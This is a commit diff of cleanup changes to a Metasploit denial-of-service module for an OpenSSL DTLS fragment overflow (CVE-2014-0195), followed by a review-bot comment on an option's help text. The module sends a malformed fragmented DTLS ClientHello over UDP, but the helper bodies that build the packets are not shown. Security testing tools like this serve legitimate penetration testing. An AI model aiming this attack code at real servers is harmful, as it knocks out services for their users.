Do minor cleanup

unstable
jvazquez-r7 2014-06-09 13:23:56 -05:00
parent 06e45e8253
commit daf662b3c0
1 changed files with 14 additions and 14 deletions


@ -8,36 +8,36 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos include Msf::Auxiliary::Dos
# include Msf::Exploit::Capture
include Exploit::Remote::Udp include Exploit::Remote::Udp
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'OpenSSL DTLS Fragment Buffer Overflow DoS', 'Name' => 'OpenSSL DTLS Fragment Buffer Overflow DoS',
'Description' => %q{ 'Description' => %q{
This module performs a Denial of Service Attack against Datagram TLS in This module performs a Denial of Service Attack against Datagram TLS in
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h. OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.
This occurs when a DTLS ClientHello message has multiple fragments and the This occurs when a DTLS ClientHello message has multiple fragments and the
fragment lengths of later fragments are larger than that of the first, a fragment lengths of later fragments are larger than that of the first, a
buffer overflow occurs, causing a DoS. buffer overflow occurs, causing a DoS.
}, },
'Author' => [ 'Author' =>
'Jon Hart <jon_hart[at]rapid7.com>', #original code [
], 'Jon Hart <jon_hart[at]rapid7.com>', #original code
],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
[ 'CVE', '2014-0195' ], ['CVE', '2014-0195'],
['ZDI', '14-173'],
['BID', '67900']
], ],
'DisclosureDate' => 'Jun 05 2014')) 'DisclosureDate' => 'Jun 05 2014'))
register_options([ register_options([
Opt::RPORT(4433), Opt::RPORT(4433),
OptInt.new('VERSION', [true, "SSl/TLS version", 0xFEFF]), OptInt.new('VERSION', [true, "SSl/TLS version", 0xFEFF])
OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
], self.class) ], self.class)
deregister_options('FILTER','PCAPFILE', 'INTERFACE', 'SNAPLEN', 'TIMEOUT')
end end
def build_tls_fragment(type, length, seq, frag_offset, frag_length, frag_body=nil) def build_tls_fragment(type, length, seq, frag_offset, frag_length, frag_body=nil)
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
fragments = build_tls_fragment(1, 2, 0, 0, 1, 'C') fragments = build_tls_fragment(1, 2, 0, 0, 1, 'C')
# add a large fragment where the length is significantly larger than that of the first # add a large fragment where the length is significantly larger than that of the first
# TODO: you'll need to tweak the 2nd, 5th and 6th arguments to trigger the condition in some situations # TODO: you'll need to tweak the 2nd, 5th and 6th arguments to trigger the condition in some situations
fragments << build_tls_fragment(1, 1234, 0, 0, 123, 'A' * 1234) fragments << build_tls_fragment(1, 1234, 0, 0, 123, Rex::Text.rand_text_alpha(1234))
message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments) message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments)
connect_udp connect_udp
print_status("Sending fragmented DTLS client hello packet to #{rhost}:#{rport}") print_status("Sending fragmented DTLS client hello packet to #{rhost}:#{rport}")
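Review bot: The `VERSION` option in `register_options` still carries the help text `"SSl/TLS version"`, which is misspelled and misleading for a DTLS module, since the default `0xFEFF` is the DTLS 1.0 wire version rather than an SSL/TLS one. As this cleanup already touches that line, it could read `OptInt.new('VERSION', [true, 'DTLS version (0xFEFF = DTLS 1.0)', 0xFEFF])`. The option value is handed straight to `build_tls_message(22, datastore['VERSION'], 0, 0, fragments)` in the second hunk; that helper's body and the rest of the enclosing method lie outside the visible hunks, so whether an out-of-range integer is rejected or silently truncated cannot be confirmed from here and may deserve a check. The rendered page has lost its +/- markers, so this assumes the copy of the line without the trailing comma is the new side.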